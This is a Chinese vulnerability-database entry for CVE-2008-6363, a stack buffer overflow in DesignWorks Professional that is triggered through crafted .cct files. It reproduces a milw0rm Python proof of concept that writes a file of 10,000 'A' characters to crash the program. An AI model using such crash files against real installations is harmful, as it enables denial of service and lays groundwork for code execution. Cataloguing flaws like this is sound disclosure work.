Capilano DesignWorks Professional '.cct'文件缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116955 漏洞类型 缓冲区溢出
发布时间 2008-12-06 更新时间 2009-03-03
CVE编号 CVE-2008-6363 CNNVD-ID CNNVD-200903-017
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/7362
https://cxsecurity.com/issue/WLB-2009030108
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-017
|漏洞详情
DesignWorksProfessiona是一款集成电路设计绘图工具。DesignWorksProfessional4.3.1版本和5.0.7版本中存在栈缓冲区溢出。远程攻击者可以借助一个特制的.cct文件,执行任意代码。
|漏洞EXP
#
#                          I'm Cn4phux
#                  ------  |      ______ _____   (--, __*__  ______
#                  |____|  |  ¤   |    | |       | ! )  |    |     |
#                [ |    |` |      | <> | |-----> |__/   |    |  ¤  | ]
#                  | .. |  |____! |____| |____   |\     |    |-----|
#                                      |        _| \  -----  | ::: |
#                                      |         |  \
#                                |_____|         |   \
#                                                |
#                                                |
#                                               ,|.
#                                              / | \
#                                             |  |  |
#                                             |  _  |
#                                           `._\/.\/_,'
#                                             _( 8 )_
#                                            / '_ _' \
#                                           |  /{_}\  |
#                                           ` |  "  | `
#                                             |     |
#
#
# [+] Application               : DesignWorks Professional 4.3.1
#
# [+] Application's Description : (" DesignWorks Professional Schematic Capture for Windows...,Google-it.)
#
# [+] Bug                       : Local .CCT File Stack Buffer Overflow (PoC)
#
# [+] Author                    : Cn4phux
#
import sys
import os
print "[x] Local Stack Overflow PoC"
try:
   milef = open("x2.cct",'w')
  
except IOError, e:
    print "Unable to open file ", e
    sys.exit(0)
print "[x] File sucessfully opened for writing."
try:
   milef.write("A" * 10000)
except IOError, e:
   
    print "Unable to write to file ", e
    sys.exit(0)
   
print "[x] Exploit successfully written."
milef.close()
print "[x] ."
print "\n[x] Cn4phux made in DZ, Great'z to all Algerians. /Google.dz"

# milw0rm.com [2008-12-06]
|参考资料

来源:VUPEN
名称:ADV-2008-3369
链接:http://www.vupen.com/english/advisories/2008/3369
来源:BID
名称:32667
链接:http://www.securityfocus.com/bid/32667
来源:MILW0RM
名称:7362
链接:http://www.milw0rm.com/exploits/7362
来源:SECUNIA
名称:33043
链接:http://secunia.com/advisories/33043